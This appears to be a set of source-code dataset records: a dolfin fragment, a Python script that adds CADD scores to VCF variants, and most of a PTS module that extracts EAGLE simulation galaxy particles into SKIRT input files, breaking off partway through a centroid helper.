get_k0 = lambda : dolfin.Expression('k0', k0=0)
get_theta_hat = lambda : dolfin.Expression(
['cos(theta)*cos(phi)', 'cos(theta)*sin(phi)', '-sin(theta)'],
theta=0, phi=0)
get_phi_hat = lambda : dolfin.Expression(['-sin(phi)', 'cos(phi)', '0.'], phi=0)
get_phase = lambda k0, rprime, r_hat : k0*dot(rprime, r_hat)
get_3d_vector = lambda : dolfin.Expression(['x1', 'x2', 'x3'],
x1=0, x2=0, x3=0)
| gpl-3.0 | 1,902,183,725,171,656,400 | 34.948718 | 80 | 0.666904 | false | 3.067834 | false | false | false |
CuppenResearch/SmallTools | Annotate_CADD_Scores_In_VCF.py | 3 | 5238 | #!/usr/bin/python
import sys, os
import vcf
import tabix
from time import time
from time import sleep
import multiprocessing as mp
from optparse import OptionParser
"""
CADD FORMAT
#Chrom Pos Ref Alt RawScore PHRED
1 10001 T A 0.176634 5.959
1 10001 T C 0.114925 5.063
"""
parser = OptionParser()
parser.add_option("--vcf", dest="vcf_file", help="Path to VCF to annotate", default=False)
parser.add_option("--snv", dest="cadd_snvs", help="Path to prescored SNVs", default=False)
parser.add_option("--indel", dest="cadd_indels", help="Path to prescored InDels", default=False)
parser.add_option("--t", dest="nr_cpus", help="Number of CPUs to use", default=8)
parser.add_option("--out", dest="out_file", help="Path to output VCF file", default="out.vcf")
(options, args) = parser.parse_args()
def check_arguments(options):
#print("Checking arguments")
if not options.vcf_file or not os.path.exists(options.vcf_file):
print("Invalid VCF file %s"%(options.vcf_file))
return False
# ---- SNV file ---
if not options.cadd_snvs or not os.path.exists(options.cadd_snvs):
print("Invalid CADD SNV file %s"%(options.cadd_snvs))
return False
if not os.path.exists(options.cadd_snvs+".tbi"):
print("No Index for CADD SNV file %s"%(options.cadd_snvs+".tbi"))
return False
# ---- InDel file ---
if not options.cadd_indels or not os.path.exists(options.cadd_indels):
print("Invalid CADD InDel file %s"%(options.cadd_indels))
return False
if not os.path.exists(options.cadd_indels+".tbi"):
print("No Index for CADD InDel file %s"%(options.cadd_indels+".tbi"))
return False
# ---- Other settings ----
try:
int(options.nr_cpus)
except Exception, e:
print("Invalid nr of cpus defined %s"%(options.nr_cpus))
return False
return True
# CHECK arguments
if not check_arguments(options):
print("Error in provided arguments")
exit(0)
# CREATE globals
VCF_READER = vcf.Reader(open(options.vcf_file, 'r'))
VCF_WRITER = vcf.Writer(open(options.out_file, 'w'), VCF_READER)
VCF_WRITER.close()
VALID_CHROMOSOMES = {"1":True,"2":True,"3":True,"4":True,"5":True,"6":True,"7":True,"8":True,"9":True,"10":True,"11":True,"12":True,"13":True,"14":True,"15":True,"16":True,"17":True,"18":True,"19":True,"20":True,"21":True,"22":True,"X":True,"Y":True}
# CADD extraction function
def extract_CADD_score(arguments, q):
vcf_record, caddfile = arguments
tb = tabix.open(caddfile)
chromosome = (vcf_record.CHROM).replace("chr","")
vcf_record.INFO["RAWCADD"] = 0
vcf_record.INFO["PHREDCADD"] = 0
# Specific for CADD files
# FIXME: get info about chr or not from provided VCF file
records = tb.query(chromosome, vcf_record.POS-1, vcf_record.POS)
# Look for matching mutation
# Works for SNVs, InDels optimisation is ongoing
for rec in records:
if rec[3] == vcf_record.ALT[0]:
# FIXME: Make requested fields optional through arguments
vcf_record.INFO["RAWCADD"] = rec[4]
vcf_record.INFO["PHREDCADD"] = rec[5]
break
# workaround since multiprocess can't handle VCF record class objects
# FIXME: use VCF class records rather than this ugly string
annotated = VCF_WRITER._map(str, [vcf_record.CHROM, vcf_record.POS, vcf_record.ID, vcf_record.REF]) + [VCF_WRITER._format_alt(vcf_record.ALT), str(vcf_record.QUAL) or '.', VCF_WRITER._format_filter(vcf_record.FILTER), VCF_WRITER._format_info(vcf_record.INFO)]
# Return results to Queue
q.put(annotated)
return(annotated)
def listener(q):
'''listens for messages on the q, writes to file. '''
#sys.stdout.write('Starting listener\n')
f = open(options.out_file, 'wb')
#FIXME: get the rest of the header
f.write("##INFO=<ID=PHREDCADD,Number=1,Type=Float,Description=\"PHRED scaled CADD score\">")
f.write("##INFO=<ID=RAWCADD,Number=1,Type=Float,Description=\"Raw CADD score\">")
f.write('#' + '\t'.join(VCF_WRITER.template._column_headers + VCF_WRITER.template.samples) + '\n')
f.flush()
while 1:
m = q.get()
if m == 'kill':
if not q.empty():
# received kill signal without finishing all the processes
sys.stdout.write('ERROR\n')
break
# received kill signal, finished all the processes, done
sys.stdout.write('DONE\n')
break
# A vcf record was found, write to file
f.write('\t'.join(m)+'\n')
f.flush()
f.close()
def main():
currtime = time()
#Init Manager queue
manager = mp.Manager()
q = manager.Queue()
# Init worker pool
pool = mp.Pool(int(options.nr_cpus))
#Init Listener
watcher = pool.apply_async(listener, (q,))
#print("Filling Queue")
#fire off workers
jobs = []
for vcf_record in VCF_READER:
chromosome = (vcf_record.CHROM).replace("chr","")
if chromosome not in VALID_CHROMOSOMES:
continue
arguments = []
if vcf_record.is_indel:
arguments = [vcf_record, options.cadd_indels]
else:
arguments = [vcf_record, options.cadd_snvs]
job = pool.apply_async(extract_CADD_score, (arguments, q))
jobs.append(job)
#print("Collecting results")
# collect results from the workers through the pool result queue
for job in jobs:
job.get()
# now we are done, kill the listener
q.put('kill')
pool.close()
pool.join()
print 'time elapsed:', time() - currtime
if __name__ == "__main__":
main()
| gpl-3.0 | -5,641,984,427,018,919,000 | 27.939227 | 260 | 0.682131 | false | 2.826767 | false | false | false |
SKIRT/PTS | eagle/extractor.py | 1 | 39415 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.eagle.extractor Extracting data for a given EAGLE galaxy from the simulation snapshot.
#
# The EAGLE simulation output is stored in a (large) set of data files in the HDF5 format, documented at the
# <a href="http://www.hdfgroup.org/HDF5/">HFD5 home page</a>. The output is organized in \em snapshots, where
# each snapshot represents the state of the universe at a particular time (or equivalently, redshift).
#
# The function in this module allows extracting information relevant for SKIRT from the EAGLE output.
# The function converts physical quantities from EAGLE snapshot units (documented through hdf5 attributes
# in the snapshot files) to SKIRT import units (documented in the SKIRT SPH classes).
# The following table lists some of the units in each system.
#
#<TABLE>
#<TR><TD><B>Physical Quantity</B></TD> <TD><B>EAGLE snapshot</B></TD>
# <TD><B>SKIRT import</B></TD></TR>
#<TR><TD>position, size</TD> <TD>\f$\textrm{Mpc}\,a\,h^{-1}\f$</TD>
# <TD>\f$\textrm{pc}\f$</TD></TR>
#<TR><TD>mass</TD> <TD>\f$10^{10}\,\textrm{M}_\odot\,h^{-1}\f$</TD>
# <TD>\f$\textrm{M}_\odot\f$</TD></TR>
#<TR><TD>velocity</TD> <TD>\f$\textrm{km/s}\,a^{1/2}\f$</TD>
# <TD>--</TD></TR>
#<TR><TD>time, age</TD> <TD>--</TD>
# <TD>year</TD></TR>
#<TR><TD>temperature</TD> <TD>K</TD>
# <TD>--</TD></TR>
#</TABLE>
#
# Note the corrections for cosmological scale factor \f$a\f$ and hubble parameter \f$h\f$ in the EAGLE snapshot units.
# -----------------------------------------------------------------
import os.path
import numpy as np
import h5py
import read_eagle # EAGLE-specific package by must be seperately installed
from ..core.tools.geometry import Transform
from . import config as config
from .skirtrun import SkirtRun
# -----------------------------------------------------------------
## This function extracts information relevant for SKIRT from the EAGLE output for the galaxy described
# by the specified SKIRT-runs database record. It places the resulting files in the "in" folder of the
# appropriate SkirtRun data structure. The function uses the following fields in the specified record:
# runid, eaglesim, snaptag, galaxyid, groupnr, subgroupnr, copx, copy, copz.
#
# The exported files are named "SIM_GID_stars.dat", "SIM_GID_hii.dat", and "SIM_GID_gas.dat", where
# SIM and GID are replaced respectively by the name of the simulation in which the galaxy resides and by the
# identifier of the galaxy in the public EAGLE database. The file format is as described for SKIRT SPH import.
# In addition, the function creates a text file named "SIM_GID_info.txt", which contains relevant statistics
# including particle numbers and various total masses. The contents is documented in the file.
def extract(record):
# ---- get the particle data
# initialise star and gas dictionaries
sdat = {}
gdat = {}
yngstars = {}
hiiregions = {}
# open snapshot and read relevant field attributes
sfn = snapfilename(record["eaglesim"], record["snaptag"])
snapshot = read_eagle.EagleSnapshot(sfn)
params = fieldAttrs(sfn, "Header")
params.update(fieldAttrs(sfn, "Constants"))
params.update(fieldAttrs(sfn, "RuntimePars"))
hubbleparam = params["HubbleParam"]
expansionfactor = params["ExpansionFactor"]
schmidtparams = schmidtParameters(params)
# convert center of potential to snapshot units
copx = record["copx"] * hubbleparam
copy = record["copy"] * hubbleparam
copz = record["copz"] * hubbleparam
# specify (2*250kpc)^3 physical volume about galaxy centre
delta = 0.25 * hubbleparam / expansionfactor
snapshot.select_region(copx-delta, copx+delta, copy-delta, copy+delta, copz-delta, copz+delta)
# read star particle informaton
insubhalo = (snapshot.read_dataset(4, "GroupNumber") == record["groupnr"]) & \
(snapshot.read_dataset(4, "SubGroupNumber") == record["subgroupnr"])
sdat['r'] = snapshot.read_dataset(4, "Coordinates") [insubhalo]
sdat['h'] = snapshot.read_dataset(4, "SmoothingLength") [insubhalo]
sdat['im'] = snapshot.read_dataset(4, "InitialMass") [insubhalo]
sdat['m'] = snapshot.read_dataset(4, "Mass") [insubhalo]
sdat['v'] = snapshot.read_dataset(4, "Velocity") [insubhalo]
sdat['Z'] = snapshot.read_dataset(4, "SmoothedMetallicity") [insubhalo]
sdat['born'] = snapshot.read_dataset(4, "StellarFormationTime") [insubhalo]
sdat['rho_born'] = snapshot.read_dataset(4, "BirthDensity") [insubhalo]
# read gas particle informaton
insubhalo = (snapshot.read_dataset(0, "GroupNumber") == record["groupnr"]) & \
(snapshot.read_dataset(0, "SubGroupNumber") == record["subgroupnr"])
gdat['r'] = snapshot.read_dataset(0, "Coordinates") [insubhalo]
gdat['h'] = snapshot.read_dataset(0, "SmoothingLength") [insubhalo]
gdat['m'] = snapshot.read_dataset(0, "Mass") [insubhalo]
gdat['v'] = snapshot.read_dataset(0, "Velocity") [insubhalo]
gdat['Z'] = snapshot.read_dataset(0, "SmoothedMetallicity") [insubhalo]
gdat['T'] = snapshot.read_dataset(0, "Temperature") [insubhalo]
gdat['rho'] = snapshot.read_dataset(0, "Density") [insubhalo]
gdat['sfr'] = snapshot.read_dataset(0, "StarFormationRate") [insubhalo]
# convert units
sdat['r'] = periodicCorrec(sdat['r'], params["BoxSize"])
sdat['r'] = toparsec(sdat['r'], hubbleparam, expansionfactor)
sdat['h'] = toparsec(sdat['h'], hubbleparam, expansionfactor)
sdat['im'] = tosolar(sdat['im'], hubbleparam)
sdat['m'] = tosolar(sdat['m'], hubbleparam)
sdat['t'] = age(sdat['born']) - age(expansionfactor)
sdat['rho_born'] *= 6.7699e-31
gdat['r'] = periodicCorrec(gdat['r'], params["BoxSize"])
gdat['r'] = toparsec(gdat['r'], hubbleparam, expansionfactor)
gdat['h'] = toparsec(gdat['h'], hubbleparam, expansionfactor)
gdat['m'] = tosolar(gdat['m'], hubbleparam)
gdat['rho'] = togcm3(gdat['rho'], hubbleparam, expansionfactor)
# remember density conversion from g cm^-3 to M_sun Mpc^-3
densconv = ((params['CM_PER_MPC']/1.e6)**3) / params['SOLAR_MASS']
# calculate the ISM pressure
sdat['P'] = getPtot(sdat['rho_born'], schmidtparams)
gdat['P'] = getPtot(gdat['rho'], schmidtparams)
# calculate stellar center of mass and translational velocity using shrinking aperture technique
com, v_bar = shrinkingCentroid(sdat['r'], sdat['m'], sdat['v'])
# find unit rotation axis vector, using only stellar information and an aperture of 30 kpc
n_rot = rotAxis(sdat['r'], sdat['v'], sdat['m'], com, v_bar, apt=30e3, aptfrac=0.08)
# translate to center of mass and line up with angular momentum vector
transf = Transform()
transf.translate(-com[0], -com[1], -com[2])
a, b, c = n_rot
v = np.sqrt(b*b+c*c)
if v > 0.3:
transf.rotateX(c/v, -b/v)
transf.rotateY(v, -a)
else:
v = np.sqrt(a*a+c*c)
transf.rotateY(c/v, -a/v)
transf.rotateX(v, -b)
sdat['r'],w = transf.transform_vec(sdat['r'][:,0],sdat['r'][:,1],sdat['r'][:,2], np.ones(sdat['r'].shape[0]))
gdat['r'],w = transf.transform_vec(gdat['r'][:,0],gdat['r'][:,1],gdat['r'][:,2], np.ones(gdat['r'].shape[0]))
# apply 30kpc aperture (i.e. remove all particles outside the aperture)
applyAperture(sdat, 30e3)
applyAperture(gdat, 30e3)
# ---- gather statistics about the data as read from the snapshot
# information identifying the SKIRT-run record and the galaxy
info = { }
info["skirt_run_id"] = record["runid"]
info["galaxy_id"] = record["galaxyid"]
# information about the particles
info["original_particles_stars"] = len(sdat['m'])
info["original_initial_mass_stars"] = sdat['im'].sum()
info["original_mass_stars"] = sdat['m'].sum()
info["original_particles_gas"] = len(gdat['m'])
info["original_mass_gas"] = gdat['m'].sum()
info["original_mass_baryons"] = info["original_mass_stars"] + info["original_mass_gas"]
# information about the direction of the stellar angular momentum axis
info["original_rotation_axis_x"] = n_rot[0]
info["original_rotation_axis_y"] = n_rot[1]
info["original_rotation_axis_z"] = n_rot[2]
# ---- initialize statistics about the exported data
info["exported_particles_old_stars"] = 0
info["exported_initial_mass_old_stars"] = 0
info["exported_mass_old_stars"] = 0
info["exported_particles_non_star_forming_gas"] = 0
info["exported_mass_non_star_forming_gas"] = 0
info["exported_particles_young_stars_from_stars"] = 0
info["exported_initial_mass_young_stars_from_stars"] = 0
info["exported_mass_young_stars_from_stars"] = 0
info["exported_particles_hii_regions_from_stars"] = 0
info["exported_initial_mass_hii_regions_from_stars"] = 0
info["exported_mass_hii_regions_from_stars"] = 0
info["exported_particles_unspent_gas_from_stars"] = 0
info["exported_mass_unspent_gas_from_stars"] = 0
info["exported_particles_young_stars_from_gas"] = 0
info["exported_initial_mass_young_stars_from_gas"] = 0
info["exported_mass_young_stars_from_gas"] = 0
info["exported_particles_hii_regions_from_gas"] = 0
info["exported_initial_mass_hii_regions_from_gas"] = 0
info["exported_mass_hii_regions_from_gas"] = 0
info["exported_particles_negative_gas_from_stars"] = 0
info["exported_particles_negative_gas_from_gas"] = 0
info["exported_mass_negative_gas_from_stars"] = 0
info["exported_mass_negative_gas_from_gas"] = 0
info["exported_particles_unspent_gas_from_gas"] = 0
info["exported_mass_unspent_gas_from_gas"] = 0
# ---- resample star forming regions
# set the "standard" constant covering fraction (see Camps+ 2016)
f_PDR = 0.1
# seed the random generator so that a consistent pseudo-random sequence is used for each particular galaxy
np.random.seed(int(record["galaxyid"]))
# define HII region age constants (in years)
young_age = 1e8 # 100 Myr --> particles below this age are resampled
infant_age = 1e7 # 10 Myr --> resampled particles below this age are converted to HII regions
# resampled particles above this age are converted young stars
# <==> lifetime of an HII region
# set up GALAXEV array
bcstars = np.column_stack([[],[],[],[],[],[],[]])
# set up MAPPINGS-III array
mapstars = np.column_stack([[],[],[],[],[],[],[],[],[]])
# set up dust array
dust = np.column_stack([[],[],[],[],[],[],[]])
# index for particles to resample
issf = gdat['sfr'] > 0.
isyoung = sdat['t'] < young_age
# append older stars to GALAXEV array
if (~isyoung).any():
bcstars = np.concatenate((bcstars, np.column_stack([sdat['r'], sdat['h'], sdat['im'], sdat['Z'], sdat['t']])[~isyoung]), axis=0)
info["exported_particles_old_stars"] = np.count_nonzero(~isyoung)
info["exported_initial_mass_old_stars"] = sdat['im'][~isyoung].sum()
info["exported_mass_old_stars"] = sdat['m'][~isyoung].sum()
# append non-SF gas data to dust array
if (~issf).any():
dust = np.concatenate((dust, np.column_stack([gdat['r'], gdat['h'], gdat['m'], gdat['Z'], gdat['T']])[~issf].copy()), axis=0)
info["exported_particles_non_star_forming_gas"] = np.count_nonzero(~issf)
info["exported_mass_non_star_forming_gas"] = gdat['m'][~issf].sum()
# resample stars
if isyoung.any():
for k in sdat.keys():
sdat[k] = sdat[k][isyoung].copy()
# calculate SFR at birth of young star particles in M_sun / yr
sdat['sfr'] = getSFR(sdat['rho_born'], sdat['im'], schmidtparams)
ms, ts, idxs, mdiffs = stochResamp(sdat['sfr'], sdat['im'])
isinfant = ts < infant_age
if (~isinfant).any():
yngstars['r'] = sdat['r'][idxs][~isinfant]
yngstars['h'] = sdat['h'][idxs][~isinfant]
yngstars['im'] = ms[~isinfant]
yngstars['Z'] = sdat['Z'][idxs][~isinfant]
yngstars['t'] = ts[~isinfant]
bcstars = np.concatenate((bcstars, np.column_stack([yngstars['r'], yngstars['h'], yngstars['im'], yngstars['Z'], yngstars['t']])), axis=0)
info["exported_particles_young_stars_from_stars"] = np.count_nonzero(~isinfant)
info["exported_initial_mass_young_stars_from_stars"] = ms[~isinfant].sum()
info["exported_mass_young_stars_from_stars"] = info["exported_initial_mass_young_stars_from_stars"]
if (isinfant).any():
hiiregions['r'] = sdat['r'][idxs][isinfant]
hiiregions['h'] = sdat['h'][idxs][isinfant]
hiiregions['SFR'] = ms[isinfant] / infant_age # Assume constant SFR over HII region lifetime
hiiregions['Z'] = sdat['Z'][idxs][isinfant]
hiiregions['P'] = sdat['P'][idxs][isinfant] * 0.1 # Convert to Pa for output
hiiregions['logC'] = 0.6*np.log10(ms[isinfant]) + 0.4*np.log10(hiiregions['P']) - 0.4*np.log10(params['BOLTZMANN']) + 0.4
hiiregions['fPDR'] = np.zeros_like(ts[isinfant]) + f_PDR # Covering fraction is set to constant value
# calculate the HII region smoothing length from the mass of the surrounding PDR region,
# estimated to be 10 times as massive (see Jonsson et al. 2010, MNRAS 403, 17-44),
# using SKIRT's standard smoothing kernel mass/size normalization: rho = 8/pi * M/h^3;
# and randomly shift the positions of the HII regions within a similarly enlarged range
hiiregions['h_mapp'] = (10*ms[isinfant] / (np.pi/8 * sdat['rho_born'][idxs][isinfant] * densconv))**(1/3.)
stochShiftPos(hiiregions['r'], hiiregions['h'], hiiregions['h_mapp'])
# append to MAPPINGSIII array
mapstars = np.concatenate((mapstars, np.column_stack([hiiregions['r'], hiiregions['h_mapp'], hiiregions['SFR'],
hiiregions['Z'], hiiregions['logC'], hiiregions['P'],
hiiregions['fPDR']])), axis=0)
info["exported_particles_hii_regions_from_stars"] = np.count_nonzero(isinfant)
info["exported_initial_mass_hii_regions_from_stars"] = ms[isinfant].sum()
info["exported_mass_hii_regions_from_stars"] = info["exported_initial_mass_hii_regions_from_stars"]
# append to dust array with negative mass to compensate for the mass of the surrounding PDR region,
# considered to be 10 times as massive; use zero temperature as T is unavailable for resampled star particles
dust = np.concatenate((dust, np.column_stack([hiiregions['r'], hiiregions['h_mapp']*3.,
-10*ms[isinfant], hiiregions['Z'],
np.zeros(hiiregions['Z'].shape[0])]).copy()), axis=0)
info["exported_particles_negative_gas_from_stars"] = np.count_nonzero(isinfant)
info["exported_mass_negative_gas_from_stars"] = 10*ms[isinfant].sum()
# add unspent young star particle material to dust array
# use zero temperature as T is unavailable for resampled star particles
mass = sdat['im'] - mdiffs
dust = np.concatenate((dust, np.column_stack([sdat['r'], sdat['h'], mass, sdat['Z'], np.zeros(sdat['Z'].shape[0])]).copy()), axis=0)
info["exported_particles_unspent_gas_from_stars"] = len(mass)
info["exported_mass_unspent_gas_from_stars"] = mass.sum()
# resample gas
if issf.any():
for k in gdat.keys():
gdat[k] = gdat[k][issf].copy()
ms, ts, idxs, mdiffs = stochResamp(gdat['sfr'], gdat['m'])
isinfant = ts < infant_age
if (~isinfant).any():
yngstars['r'] = gdat['r'][idxs][~isinfant]
yngstars['h'] = gdat['h'][idxs][~isinfant]
yngstars['im'] = ms[~isinfant]
yngstars['Z'] = gdat['Z'][idxs][~isinfant]
yngstars['t'] = ts[~isinfant]
bcstars = np.concatenate((bcstars, np.column_stack([yngstars['r'], yngstars['h'], yngstars['im'], yngstars['Z'], yngstars['t']])), axis=0)
info["exported_particles_young_stars_from_gas"] = np.count_nonzero(~isinfant)
info["exported_initial_mass_young_stars_from_gas"] = ms[~isinfant].sum()
info["exported_mass_young_stars_from_gas"] = info["exported_initial_mass_young_stars_from_gas"]
if (isinfant).any():
hiiregions['r'] = gdat['r'][idxs][isinfant]
hiiregions['h'] = gdat['h'][idxs][isinfant]
hiiregions['SFR'] = ms[isinfant] / infant_age # Assume constant SFR over HII region lifetime
hiiregions['Z'] = gdat['Z'][idxs][isinfant]
hiiregions['P'] = gdat['P'][idxs][isinfant] * 0.1 # convert to Pa
hiiregions['logC'] = 0.6*np.log10(ms[isinfant]) + 0.4*np.log10(hiiregions['P']) - 0.4*np.log10(params['BOLTZMANN']) + 0.4
hiiregions['fPDR'] = np.zeros_like(ts[isinfant]) + f_PDR # Covering fraction is set to constant value
# calculate the HII region smoothing length from the mass of the surrounding PDR region,
# estimated to be 10 times as massive (see Jonsson et al. 2010, MNRAS 403, 17-44),
# using SKIRT's standard smoothing kernel mass/size normalization: rho = 8/pi * M/h^3;
# and randomly shift the positions of the HII regions within a similarly enlarged range
hiiregions['h_mapp'] = (10*ms[isinfant] / (np.pi/8 * gdat['rho'][idxs][isinfant] * densconv))**(1/3.)
stochShiftPos(hiiregions['r'], hiiregions['h'], hiiregions['h_mapp'])
# append to MAPPINGSIII array
mapstars = np.concatenate((mapstars, np.column_stack([hiiregions['r'], hiiregions['h_mapp'], hiiregions['SFR'],
hiiregions['Z'], hiiregions['logC'], hiiregions['P'],
hiiregions['fPDR']])), axis=0)
info["exported_particles_hii_regions_from_gas"] = np.count_nonzero(isinfant)
info["exported_initial_mass_hii_regions_from_gas"] = ms[isinfant].sum()
info["exported_mass_hii_regions_from_gas"] = info["exported_initial_mass_hii_regions_from_gas"]
# append to dust array with negative mass to compensate for the mass of the surrounding PDR region,
# considered to be 10 times as massive; use negative temperature to indicate that it is not a physical value
dust = np.concatenate((dust, np.column_stack([hiiregions['r'], hiiregions['h_mapp']*3,
-10*ms[isinfant], hiiregions['Z'], -gdat['T'][idxs][isinfant]]).copy()), axis=0)
info["exported_particles_negative_gas_from_gas"] = np.count_nonzero(isinfant)
info["exported_mass_negative_gas_from_gas"] = 10*ms[isinfant].sum()
# add unspent SF gas material to dust array; use negative temperature to indicate that it is not a physical value
mass = gdat['m'] - mdiffs
dust = np.concatenate((dust, np.column_stack([gdat['r'], gdat['h'], mass, gdat['Z'], -gdat['T']]).copy()), axis=0)
info["exported_particles_unspent_gas_from_gas"] = len(mass)
info["exported_mass_unspent_gas_from_gas"] = mass.sum()
# ---- make some sums and write the statistics and output files
info["exported_particles_young_stars"] = info["exported_particles_young_stars_from_stars"] + info["exported_particles_young_stars_from_gas"]
info["exported_initial_mass_young_stars"] = info["exported_initial_mass_young_stars_from_stars"] + info["exported_initial_mass_young_stars_from_gas"]
info["exported_mass_young_stars"] = info["exported_mass_young_stars_from_stars"] + info["exported_mass_young_stars_from_gas"]
info["exported_particles_stars"] = info["exported_particles_old_stars"] + info["exported_particles_young_stars"]
info["exported_initial_mass_stars"] = info["exported_initial_mass_old_stars"] + info["exported_initial_mass_young_stars"]
info["exported_mass_stars"] = info["exported_mass_old_stars"] + info["exported_mass_young_stars"]
info["exported_particles_hii_regions"] = info["exported_particles_hii_regions_from_stars"] + info["exported_particles_hii_regions_from_gas"]
info["exported_initial_mass_hii_regions"] = info["exported_initial_mass_hii_regions_from_stars"] + info["exported_initial_mass_hii_regions_from_gas"]
info["exported_mass_hii_regions"] = info["exported_mass_hii_regions_from_stars"] + info["exported_mass_hii_regions_from_gas"]
info["exported_particles_unspent_gas"] = info["exported_particles_unspent_gas_from_stars"] + info["exported_particles_unspent_gas_from_gas"]
info["exported_mass_unspent_gas"] = info["exported_mass_unspent_gas_from_stars"] + info["exported_mass_unspent_gas_from_gas"]
info["exported_particles_negative_gas"] = info["exported_particles_negative_gas_from_stars"] + info["exported_particles_negative_gas_from_gas"]
info["exported_mass_negative_gas"] = info["exported_mass_negative_gas_from_stars"] + info["exported_mass_negative_gas_from_gas"]
info["exported_particles_gas"] = info["exported_particles_non_star_forming_gas"] + info["exported_particles_unspent_gas"] + info["exported_particles_negative_gas"]
info["exported_mass_gas"] = info["exported_mass_non_star_forming_gas"] + info["exported_mass_unspent_gas"] # - info["exported_mass_negative_gas"]
info["exported_mass_baryons"] = info["exported_mass_stars"] + info["exported_mass_hii_regions"] + info["exported_mass_gas"]
# create the appropriate SKIRT-run directories
skirtrun = SkirtRun(record["runid"], create=True)
filepathprefix = os.path.join(skirtrun.inpath(), "{}_{}_".format(record["eaglesim"], record["galaxyid"]))
# write the statistics file
infofile = open(filepathprefix + "info.txt", 'w')
infofile.write('# Statistics for SPH particles extracted from EAGLE HDF5 snapshot to SKIRT6 format\n')
infofile.write('# Masses are expressed in solar mass units\n')
maxkeylen = max(map(len,info.keys()))
for key in sorted(info.keys()):
valueformat = "d" if "_particles_" in key or "_id" in key else ".9e"
infofile.write( ("{0:"+str(maxkeylen)+"} = {1:15"+valueformat+"}\n").format(key, info[key]) )
infofile.close()
# ---- write output files
# open output files
starsfile = open(filepathprefix + "stars.dat", 'w')
starsfile.write('# SPH Star Particles\n')
starsfile.write('# Extracted from EAGLE HDF5 snapshot to SKIRT6 format\n')
starsfile.write('# Columns contain: x(pc) y(pc) z(pc) h(pc) M(Msun) Z(0-1) t(yr)\n')
gasfile = open(filepathprefix + "gas.dat", 'w')
gasfile.write('# SPH Gas Particles\n')
gasfile.write('# Extracted from EAGLE HDF5 snapshot to SKIRT6 format\n')
gasfile.write('# Columns contain: x(pc) y(pc) z(pc) h(pc) M(Msun) Z(0-1) T(K)\n')
hiifile = open(filepathprefix + "hii.dat", 'w')
hiifile.write('# SPH Hii Particles\n')
hiifile.write('# Extracted from EAGLE HDF5 snapshot to SKIRT6 format\n')
hiifile.write('# Columns contain: x(pc) y(pc) z(pc) h(pc) SFR(Msun/yr) Z(0-1) logC P(Pa) f_PDR\n')
# save particle data
np.savetxt(starsfile, bcstars, fmt=['%f']*7)
np.savetxt(gasfile, dust, fmt=['%f']*7)
np.savetxt(hiifile, mapstars, fmt=['%f']*7+['%e','%f'])
# close output files
starsfile.close()
gasfile.close()
hiifile.close()
# -----------------------------------------------------------------
## This private helper function returns the absolute path to the first EAGLE snapshot file
# corresponding to the given EAGLE simulation name and snapshot tag
def snapfilename(eaglesim, snaptag):
# snapshot filename segment corresponding to the snapshot tag
snapname = { 0 : "000_z020p000",
1 : "001_z015p132",
2 : "002_z009p993",
3 : "003_z008p988",
4 : "004_z008p075",
5 : "005_z007p050",
6 : "006_z005p971",
7 : "007_z005p487",
8 : "008_z005p037",
9 : "009_z004p485",
10 : "010_z003p984",
11 : "011_z003p528",
12 : "012_z003p017",
13 : "013_z002p478",
14 : "014_z002p237",
15 : "015_z002p012",
16 : "016_z001p737",
17 : "017_z001p487",
18 : "018_z001p259",
19 : "019_z001p004",
20 : "020_z000p865",
21 : "021_z000p736",
22 : "022_z000p615",
23 : "023_z000p503",
24 : "024_z000p366",
25 : "025_z000p271",
26 : "026_z000p183",
27 : "027_z000p101",
28 : "028_z000p000" } [snaptag]
return os.path.join(config.eagledata_path[eaglesim],
"particledata_{0}/eagle_subfind_particles_{0}.0.hdf5".format(snapname))
# -----------------------------------------------------------------
## This private helper function reads a hdf5 file field's attributes into a python dictionary.
def fieldAttrs(filename, fieldname):
fileobj = h5py.File(filename, 'r')
fieldobj = fileobj[fieldname]
fieldkeys = list(fieldobj.attrs)
result = { }
for key in fieldkeys:
result[key] = fieldobj.attrs[str(key)]
return result
# -----------------------------------------------------------------
## This private helper function converts a length/distance/size value from EAGLE snapshot units to parsec
def toparsec(eaglevalue, hubbleparam, expansionfactor):
return eaglevalue * (1e6 * expansionfactor / hubbleparam)
## This private helper function converts a mass value from EAGLE snapshot units to solar masses
def tosolar(eaglevalue, hubbleparam):
return eaglevalue * (1e10 / hubbleparam)
## This private helper function converts a velocity value from EAGLE snapshot units to km/s
def tokms(eaglevalue, expansionfactor):
return eaglevalue * np.sqrt(expansionfactor)
## This private helper function converts a current density value from EAGLE snapshot units to g m^-3
def togcm3(eaglevalue, hubbleparam, expansionfactor):
return eaglevalue * (6.7699e-31 * (expansionfactor**-3) * (hubbleparam**2))
## This private helper function returns the age of a star (in yr) given the universe expansion factor
# when the star was born (in range 0-1)
def age(R):
H0 = 2.3e-18
OmegaM0 = 0.27
yr = 365.25 * 24 * 3600
T0 = 13.7e9
return T0 - (2./3./H0/np.sqrt(1-OmegaM0)) * np.arcsinh(np.sqrt( (1/OmegaM0-1)*R**3 )) / yr
# -----------------------------------------------------------------
## This private helper function returns the periodicity corrected coordinates input as a (N,3)
# numpy array, and takes the box size (in units of crds) and a test length in units of box size
def periodicCorrec(crds, boxsize, testfact = 0.5):
if len(crds)>0:
for i in range(3):
crd = crds[:,i]
booldx = np.abs(crd - crd.min()) > boxsize * testfact
if booldx.any():
crd[booldx] = crd[booldx] - boxsize
return crds
# -----------------------------------------------------------------
## This private helper function returns the centre of mass or the centre of mass and mean velocity
# from input particle data, in the units of crds and vels respectively
def centroid(crds, masses, vels):
moments = (crds * np.column_stack([masses]*3)).sum(axis = 0)
M = masses.sum()
if vels.any():
momenta = (vels * np.column_stack([masses]*3)).sum(axis = 0)
return moments/M, momenta/M
else:
return moments/M
# -----------------------------------------------------------------
## This private helper function returns the periodicity corrected coordinates input as a (N,3)
# numpy array, and takes the box size (in units of crds) and a test length in units of box size.
# Finds the centroid of a given set of particles, each time reducing the
# maximum distance between the previously found centroid to particles used
# to calculate the next centroid.
def shrinkingCentroid(crds, masses, vels, thresh=200, shrinkfactor=1.2):
N = np.inf # N set high initially to consider all particles
while N >= thresh:
C, C_vel = centroid(crds, masses, vels)
# define new aperture size as eps
eps = ((((crds-C)**2).sum(axis = -1))**0.5).max()/float(shrinkfactor)
# index for particles within new aperture size
shiftcrds = crds - C
boolidx = ((shiftcrds**2).sum(axis = -1))**0.5 < eps
N = boolidx.sum()
crds = crds[boolidx].copy()
masses = masses[boolidx].copy()
